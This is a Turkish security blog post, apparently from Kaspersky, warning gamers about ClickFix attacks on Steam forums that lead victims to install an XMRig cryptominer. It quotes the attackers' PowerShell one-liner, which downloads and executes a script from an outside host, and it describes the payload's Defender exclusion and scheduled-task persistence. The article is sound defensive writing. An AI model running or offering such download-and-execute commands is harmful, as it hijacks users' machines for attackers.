Bu yıl, ClickFix saldırılarında gerçek bir artış yaşandı. Suçlular arasında o kadar popüler ki, bir varyant hakkında yazımızı daha bitirmeden bir sonraki varyantı incelemenin zamanı gelmiş oluyor.
Bu sefer saldırganlar oyuncuları hedef alıyor: Teknoloji muhabirleri, Steam forumlarında zararlı tavsiyeler içeren paylaşımlar tespit etti. Bu paylaşımlar nasıl görünüyor, hangi zararlı yazılımları yaymak için kullanılıyor ve cihazınızı nasıl güvende tutabilirsiniz?
ClickFix, Steam forumlarında yer buluyor
Birçok oyuncu, zorlu bir görevi tamamlamak, seviye atlamak, en iyi ganimetleri elde etmek ya da bir hatayı aşmak gibi konularda yardım ve tavsiye almak için Steam forumlarındaki diğer oyunculara başvurur. Saldırganlar da tam da topluluktan gelen tavsiyelere duyulan bu güveni istismar etmeyi hedefliyor.
Saldırı, suçluların, bir kişinin oyun çökmeleri, kaybolan envanter ögeleri veya diğer teknik sorunlarla ilgili sorusuna yanıt vermesiyle başlıyor. Yardımsever yorumcular gibi davranarak, PowerShell’i yönetici olarak açmayı ve kullanıcının yaşadığı sorunu sözde çözecek bir komutu çalıştırmayı öneriyorlar.

Gönderisini sorun giderme tavsiyesi gibi göstererek, kötü niyetli kişi PowerShell’i yönetici olarak çalıştırmayı ve kullanıcının sorununu çözdüğü iddia edilen bir komutu yürütmeyi öneriyor. Kaynak
Tahmin edebileceğiniz gibi, bu komutu çalıştırmak hiçbir şeyi düzeltmez; sadece yepyeni bir sorunlar zincirini başlatır. ClickFix’in ardındaki temel fikir budur: Sosyal mühendislik yöntemlerini kullanarak kurbanları, cihazı ele geçirmek için dolandırıcıların ihtiyaç duyduğu bilgileri vermeye ikna etmek. Daha önce ClickFix ile ilgili başka hilelerden de bahsetmiştik (sahte CAPTCHA’lar, uydurma tarayıcı hataları ve daha fazlası); bunların hepsi, kurbanın kötü amaçlı komutu kendi isteğiyle çalıştırmasını sağlamaya dayanıyor. ClickFix saldırılarının farklı türleri hakkında daha fazla bilgiyi önceki yazımızda bulabilirsiniz.
Steam forumlarında ClickFix’i kullanmanın sinsi yanı, saldırının yalnızca yardım isteyen oyuncuyu değil, aynı sorunla karşılaşan ve Google araması yoluyla cevabı bulan pek çok başka oyuncuyu da tuzağa düşürebilmesidir.
Kısa bir giriş: irm | iex komutunun arkasında gerçekte ne var?
Saldırganların oyuncuları bu şekilde yüklemeye nasıl kandırdıklarına girmeden önce, bazı teknik bilgileri ele almamız gerekiyor. Öncelikle, Steam forumlarındaki mesajlar, hiçbir şeyden haberi olmayan potansiyel kurbanlara PowerShell’de aşağıdaki komutu çalıştırmalarını tavsiye ediyor:
irm msfconfig.icu | iex
PowerShell’i yakından tanımayan birine bu satır oldukça zararsız görünebilir; birkaç ek parametreyle birlikte Windows’un yerleşik sistem yapılandırma aracı olan MSConfig’i çalıştırmaya benziyor.
Oysa gerçekte, bu hiç de zararsız bir şey değildir. Bu komutun her bir bölümünün aslında ne işe yaradığını tek tek inceleyelim:
- irm, yerleşik Invoke-RestMethod PowerShell komutunun kısaltmasıdır. Satırın ilerleyen kısımlarında belirtilen web adresine erişir ve yanıt olarak verileri alır.
- icu, o web adresidir; ilk bakışta öyle görünebileceği gibi, herhangi bir yerel dosyanın adı değildir. Bu, saldırganların sunucusudur ve irm talebine kötü amaçlı bir PowerShell komut dosyası ile yanıt vermektedir.
- iex, PowerShell’in bir başka yerleşik komutudur: Invoke-Expression. irm komutunun o web adresinden aldığı her şeyi alır ve bunu PowerShell kodu olarak çalıştırır.
Bu PowerShell kod satırı çalıştırıldığında, belirtilen siteden bir komut dosyası indirir ve hemen çalıştırır. Bir Reddit kullanıcısının haklı olarak işaret ettiği gibi, ikinci kısmı, yani iex kısmını silerek, kodun çalıştırılma riski olmadan, cihazınıza gerçekten hangi kodun indirileceğini güvenle öğrenebilirsiniz. Bu seçenek olmadan, komut sadece komut dosyasının içeriğini indirir ve bunları yürütmeden PowerShell penceresine yazdırır. Bu, cihazınızda çalıştırmanız istenen kodun tam ve engelsiz halini size sunar. Şimdi de, bu yardımsever Steam forum kullanıcılarının aslında oyuncuların bilgisayarlarına neyi yüklemelerini sağlamaya çalıştıklarına bir göz atalım.
Optimizasyon aracı değil, bir kripto madenciliği
Saldırganlar ödevlerini iyi yapmış: Sunucularından indirilen PowerShell komut dosyası, bir Windows optimizasyon aracını taklit etme konusunda oldukça inandırıcı. Uygulama başlatıldığında, kullanıcıya geçici dosyaları temizleyeceğini, DNS önbelleğini boşaltacağını, sürücüleri güncelleyeceğini, diskte hata olup olmadığını kontrol edeceğini, gereksiz başlangıç uygulamalarını devre dışı bırakacağını, sistemi zararlı yazılımlara karşı tarayacağını, Windows görüntüsünü onaracağını ve sistem dosyalarının bütünlüğünü doğrulayacağını iddia eden bir dizi bildirim gösteriyor.

Bu komut dosyası, yararlı bir bakım işlemi gerçekleştiriyormuş gibi görünmesi için çeşitli sahte optimizasyon görevlerine ilişkin bir dizi mesaj görüntülüyor. Kaynak
Oysa asıl hareket, sahne arkasında yaşanmakta. Komut dosyası, öncelikle yönetici ayrıcalıklarıyla çalıştırılıp çalıştırılmadığını kontrol ederek işe başlıyor. Çalıştırılmış durumdaysa, C:\Windows\Background konumunda gizli bir çalışma klasörü oluşturuyor ve bunu Microsoft Defender’ın istisna listesine ekliyor. O andan itibaren, söz konusu klasöre yerleştirilen dosyalar Windows’un yerleşik antivirüs programı tarafından taranmaz hale geliyor.
Ardından, komut dosyası sistemi saldırının bir sonraki aşamasına hazırlıyor ve saldırganların sunucusundan bir yürütülebilir dosya indiriyor; bu dosyayı, kulağa yasal gibi gelen system.exe adıyla aynı C:\Windows\Background klasörüne kaydediyor.
İndirilen dosya, Monero kripto para birimini madenciliği için en popüler araçlardan biri olan XMRig. XMRig‘in kendisi zararlı yazılım değil; yasal, açık kaynaklı bir madencilik aracı. Sorun şu ki, saldırganlar bunu kurbanların bilgisayarlarına onların haberi olmadan yüklüyor. Cihaz çalışmaya başladığında, hesaplama gücü Monero madenciliği için ele geçiriliyor ve elde edilen kripto para doğrudan saldırganların eline geçiyor.
Bu durum, oyuncuların bilgisayarlarını özellikle cazip hedefler haline getiriyor: Modern oyun bilgisayarları, kripto madenciliği için biçilmiş kaftan olan güçlü CPU’lar ve GPU’lar bulunuyor.
Zararlı yazılımın sistemin yeniden başlatılmasından sonra da çalışmaya devam etmesini sağlamak için, komut dosyası ayrıca Windows Görev Zamanlayıcısı’nda yeni bir görev oluşturuyor: XMRig-{bilgisayar adı}. O andan itibaren, sistem her başlatıldığında kripto madenciliği programı otomatik olarak çalışmaya başlıyor.
Cihazınızı kripto madencileri ve diğer zararlı yazılımlardan nasıl koruyabilirsiniz?
Ne yazık ki, pek çok oyuncu cihazlarına güvenlik yazılımı yüklemeyi veya bu yazılımı çalışır durumda tutmayı istemiyor. Bunun başlıca nedeni, “antivirüs programı oyunu yavaşlatır” şeklindeki yaygın inanış. Bu konuyla ilgili araştırmaları daha önce blogumuzda ele almıştık ve sonuçlar, oyun oynarken bir antivirüs programının çalıştırılmasının performans üzerinde kayda değer bir düşüşe yol açmadığını göstermişti.
Ancak aynı şey kripto madencileri için geçerli değil. Kripto madencileri performansı kesinlikle olumsuz etkiliyor ve üstelik donanımınızı daha hızlı yıpratıyor. Peki, oyun bilgisayarınızı ve hesaplarınızı tehlikeden korumak için ne yapabilirsiniz?
- Forumlarda, sohbetlerde veya yorumlarda tanımadığınız kişilerin kopyalayıp çalıştırmanızı önerdiği PowerShell, Terminal veya diğer komut istemi komut dosyalarını çalıştırmaktan kaçının.
- Tam olarak anlamadığınız herhangi bir komutta Enter tuşuna basmadan önce, o komutun ne işe yaradığını ve çalıştırılmasının yol açabileceği olası sonuçları araştırın.
- Zararlı yazılım indirme girişimlerini zamanında tespit edip bunların çalışmasını engelleyen bir oyun moduna sahip, güvenilir bir güvenlik çözümü kullanın.
- Oyun oynarken korumayı kapatmayın. Özel bir oyun moduna sahip bir çözüm kullanmak en doğru seçimdir. Kaspersky güvenlik ürünleri, bir oyun başlatılır başlatılmaz bu modu otomatik olarak etkinleştirir ve siz oyunu bitirene kadar antivirüs veri tabanı güncellemelerini, bildirimleri ve zamanlanmış disk taramalarını askıya alır.
Saldırganların oyuncuları başka nasıl hedef aldığını merak ediyor musunuz? Diğer yazılarımıza göz atın:
Stealka Stealer: Oyun hileleri, modları ve crack’lerinin yeni yüzü
Unity oyun motorundaki zayıf nokta
Oyuncular hedefte: Resmi web sitelerinde zararlı yazılımlar
oyun severler
İpuçları